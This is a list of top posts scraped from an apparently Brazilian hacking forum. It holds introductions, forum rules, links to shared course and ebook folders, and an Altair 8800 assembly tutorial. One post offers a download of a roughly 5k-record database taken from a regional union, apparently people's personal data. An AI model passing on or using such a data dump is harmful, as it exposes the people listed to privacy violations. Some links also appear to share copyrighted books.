    Agarrei nessa maldita 6 heuheuhe. Chego até certa parte.
  31. 1 point
  32. 1 point
    <head> <title>Prazer em conhecelos</title> </head> <body> Sou novo aqui, tenho 17 anos, me interessei por computadores aos 12 anos quando comecei a fazer cursos de programação, não posso dizer em que nivel estou porque nem mesmo eu sei, em coisas facéis eu geralmente "mosco" e em coisas q são um pouco mais complexas tenho facilidade Estou aqui atras de conhecimento </body>
  33. 1 point
    Curso de criação da Amendy (Bot para criar trabalho)
  34. 1 point
    galera mais um software ai, dessa vez do sindicato de vr e algumas cidades proximas, bom para encontrar um mecanico quando o carro da pau em algum lugar ou alguem que trabalha em alguma area especifica para algum tipo de trabalho. O DB é bem pequeno tem apenas 5k de dados (obs: algumas colunas nao ficaram muito ordenadas =/ ) downnload (mega)
  35. 1 point
    Mais duvidas. Abre a documentação. Linguagem um pouco xata, mas tá tudo lá!
  36. 1 point
    É que a galera aqui é esperta, não curte pegar exe sem fonte, principalmente sendo pra Windows. De toda forma agradecido pelo fonte.
  37. 1 point
    Bom esse e um link no MEGA com varios PDFs, video-aulas e alguns programas nessa apostila tem muitos material sobre Hacking Sistemas-operacionais e algumas coisinhas sobre as leis do brasil para quem quiser hackea a nasa kkk tem algumas outras apostilas de areas que nao entrao muito na parte de hacking mais isso e so deixar de lado. E tem uma apostila para quem quiser aprender a falar ingles. ==> https://mega.nz/#F!IUAGTAAb!bsOdM6-XG6BBcoKh638REQ!wcoHhSzL
  38. 1 point
    KKKKKKKKKKKKKKKKKK
  39. 1 point
    Tópico movido para área correta. Eae mano, beleza? Vi que é novo aqui, mas o fórum tem alguns subfóruns (Ex: Hacker > Outros) e é neles que se posta, beleza? Seja bem vindo
  40. 1 point
    Desculpe resposta duplicada, adm. haahhaahah Achei e concertei o erro. Se pra alguem estiver retornando o erro que eu citei acima, é so instalar o pacote maven apt-get install maven
  41. 1 point
    Vou tentar fazer um tutorial gente, tava MT tempo sem entrar no forum
  42. 1 point
    Hi Homies! me chamo lthy gosto de informática e inglês sou formado em segurança da informação e estou aqui pra ajudar pro que der e vier.
  43. 1 point
    Sou adm de sistemas SUS, a três anos uso o linux na minha pc. E estou me preparando para o LPIC-1 e CompTIA Linux.
  44. 1 point
    Kkk acho q ele considerou o post como uma "sugestão de leitura", deve ser por isso q postou em sugestões..
  45. 1 point
    Oi, Tenho esses links faz um tempo, acho valido compartilhar aqui... pode servir para alguem ENGENHARIA E SOFTWARE 1 E 2: https://mega.nz/#F!xUo1TSzZ!BgcpPzyStG39GSADpUE0XQ CURSOS DE PROGRAMAS: https://mega.nz/#F!QYZkVDbK!7dqdt6AyX11fa63IWfT2dQ PROGRAMAÇÃO: https://mega.nz/#F!ZYQUnZLY!84B_8qPgkKQXrY0V1vDz3A MMAC: https://mega.nz/#F!cBQmFLCR!wH87lxmhrtK26sqsQ4myDw SISTEMA OP/ SISTEMA OP RESERVA: https://mega.nz/#F!lJwmEabD!47Vj_JjOVzVMmS4eWn6O7A https://mega.nz/#F!G44DRDAQ!_XIwJ_O1gP6fTVNXYew__Q REDES DE PC'S 1/2: https://mega.nz/#F!FIYAgQDA!6zUidNqJxfNvAvrQCBeguw https://mega.nz/#F!HhZDwLbb!2TyC3GQ7giEOZeWUJuC-cA BANCO DE DADOS: https://mega.nz/#F!M1ISHT7J!ibTJtUJqj4Jh7Id7dEebuA ESTUDOS GERAIS: https://mega.nz/#F!Kd1BhCDS!LKAhyAR7CHUy0bpA83nkhg OUTROS: https://mega.nz/#F!Ql0FzJRB!QB5qU2GY4aOPuuH2zGnhHA EDIT: 2 ULTIMOS LINKS TEM CONTEUDO PRA QUEM FAZ ENEM E ETC....
  46. 1 point
    Bom galera, tá aí o PDF sobre "HONEYPOT". Honeypot.pdf
  47. 1 point
    Salve hackudões de plantão. Para boa convivência de todos, devemos seguir algumas regrinhas básicas e simples para que ninguém cometa homicídio neste recinto. Regras de convivência: - Jamais ofender, xingar e/ou agredir o coleguinha; - Você é livre para postar sua opinião mas não pode impor a mesma sobre os demais. Regras para Posts: - Não postar pornografia infantil, warez, gore e qualquer outro tipo de conteúdo doente; - Não fazer spam; - Não anexar arquivos "batizados", se a administração pegar você se tornará um alvo de 20 mil pessoas. Use o conhecimento de forma sadia e aproveite a quantidade enorme de conteúdo que temos aqui. Best regards.
  48. 1 point
    e ae galera blz? nesse tutorial vamos programar para um computador antigo da decada 70, sendo essa maquina um altair 8800 da mits. Nesse tutorial vamos esta usando um simulador ja que é uma maquina extramente antiga e rara entre colecionadores (nunca tive oportunidade de mexer com um de verdade, queria uma replica de natal para brincar kkk =/ ), no caso para esse tutorial vamos usar o "altair 8800 emulator" embora exista outros emuladores para ele inclusive alguns onlines site oficial (altair32) bom galera antes de começar a brincar com o emulador temos que entender algumas coisas, a primeira delas que programar esse tipo de maquina não é tão simples como as atuais onde a gente cria o codigo em C, Pascal ou qualquer outra linguagem usando uma IDE bonitinha e depois joga no disco para dar boot. As maquinas mais antigas as vezes nem tinha o teclado ou monitor, apenas leds para sinalizar o bit daquele barramento, chaves ou botões para mudar os estados deles (no caso do altair são aquelas chaves do tipo alavanca). Outra coisa que temos que citar que a arquitetura do altair 8800 é baseado nos processadores intel 8080 (talvez exista variantes em 8085 ou ate em z80 ja que o proprio simulador tem a opção z80, alem dessas arquiteturas tambem serem compativeis de certa forma, embora creio que precise mudar um pouco o circuito para que isso seja possivel ~ uma coisa interessante que os computadores imsai 8080 é um clone do altair, eles tambem usavam processadores 8080, ate que começaram a ser fabricados usando o 8085 como cpu). Como o computador é baseado em 8080 então a arquitetura e o assembly usado na arquietura atual x86 não é compativel com essa maquina, nem o set de instruções e nem o binario gerado (para isso, temos que programar exatamente para a arquitetura 8080 ou ate mesmo o 8085 e z80, excluindo algumas instruções não compativel com o 8080). bom galera agora que a gente ja falou um pouco sobre esse computador vamos da uma olhada em uma imagem que peguei wikipedia dessa maquina o que precisamos entender que vamos programar ele manualmente bit a bit formando o codigo binario equivalente aquela instrução do 8080, depois podemos rodar o programa tanto passo a passo quanto de uma vez. primeiro de tudo vamos entender um pouco do painel desse trem. O primeiro botão que vamos ver é o que fica no lado esquerdo do canto inferior (escrito off e on ~ coloquei em vermelho), esse botão liga e desliga a maquina (quando empurramos a alavanca para on ele liga para off ele desliga), o segundo botão que vamos analisar sera o botão para rodar o programa do computador, sendo esse botão o run (no meu exemplo ele é o verde), para a gente usar esse botão temos que coloca o programa antes ne (esse emulador ja tem um programa padrao nele entao podemos dar um run sem problema), outra coisa que podemos ver que os leds que estiver escrito A e os D vao mudar constantemente sendo os leds A representando os endereços de memorias (normalmente vai mudar sequencialmente menos quando acontecer um jmp) e o D representando a instrução ou os dados (lembrando que isso é binario ~ no exemplo abaixo seria o codigo hexadecimal 8 no barramento de dados e no barramento endereço de memoria o numero 4cff), podemos apertar em stop para parar o programa no trecho atual da memoria (tambem a cor verde porem para cima dessa vez), depois que o programa estiver parado podemos apertar em run novamente para rodar ele novamente podemos rodar o programa passo a passo depois de parado usando o botão single step (no meu exemplo ele é o verde claro), o single step tambem serve para passar para o proximo dado na memoria (executando ele é claro) para a gente resetar os registradores tambem seria meio para reiniciar o computador sem cortar a sua energia, usamos o botão reset (no meu exemplo é o roxo) para a gente ir para um endereço de memoria especifico temos que setar os bits equivalente a ele no barramento de endereço, para isso usamos os botões do barramento de endereço/dados (no meu exemplo é a cor marrom), supondo que eu quero debugar o meu programa a partir da posição hexadecimal 25 (100101) de memoria, então basta setar o valor 100101 nos botões de barramento e depois usar o botão de leitura ou Examine para pular para aquele trecho (no meu caso é o azul claro o botão), o Examine Next é executado para ler o proximo byte porem não executar como codigo para a gente escrever na memoria primeiro vamos para a posição desejada como no exemplo anterior, depois escrevemos no barramento de dados usando os botões de barramento (esse botão serve tanto para memoria quanto para os dados a diferença que os dados sao apenas 8 bits ou seja os oitos primeiros botões ja que é um processador de 8 bits), por fim usamos o botão deposit (no meu exemplo era o azul escuro), o Deposit Next vai pular a instrução e escrever no proximo endereço depois dela, no exemplo abaixo eu escrevo o byte 05 na memoria um simples programa que atribui um valor a um registrador depois soma com um outro valor a esse registrador depois joga na memoria no endereço 0b, no caso a instrução hlt vai parar o programa (seria o mesmo que puxar o botão stop porem por software), depois basta a gente da um step para o proximo dado para ter o resultado mvi a,50h mvi b,10h add b mvi h,0 mvi l,0bh mov m,a hlt depois de compilado vai gerar o codigo binario abaixo (representei ele em hex), voce pode criar seus proprios programas e não se limitar ao meu, bastando usar um compilador para 8080,8085 ou z80 para descobrir os bytes equivalente (ou procurar em manuais dessa arquitetura pelo set de instruções tambem) 3e 50 06 10 80 26 00 2e 0b 77 76 00 depois disso basta voce escrever cada byte desse sequencialmente a partir do endereço de memoria 0 ( vai da um trabalho isso em u.u ), depois executar o programa ele ate ele para no hlt como previsto pelo codigo, para a gente exibir o resultado basta exibir o proximo dado apertando o Examine Next (ele ler o proximo endereço da memoria sem executar), no meu exemplo tem que da o valor 60 (1100000) bom galera sei que tem muita coisa para falar sobre esse computador principalmente voltado a parte de programação, porem, esse tutorial foi feito para mostrar o funcionamento basico dessa maquina sem nos aprofundar tanto, então quem sabe em algum futuro tutorial eu entro de cabeça para ensinar asm 8080/8085 ou ate mesmo z80 ^^ by kodo no kami
  49. 1 point
    coé pedrão. Pra mim tu e o mais pika karai
  50. 1 point
    Livro de engenharia social escrito por um dos maiores Hackers da História, leiam abaixo: https://www.docdroid.net/Mq0Edkm/kevin-mitnick-a-arte-de-enganar.pdf.html
This leaderboard is set to Sao Paulo/GMT-03:00
×
×
  • Create New...

Important Information

By using this site, you agree to our Terms of Use.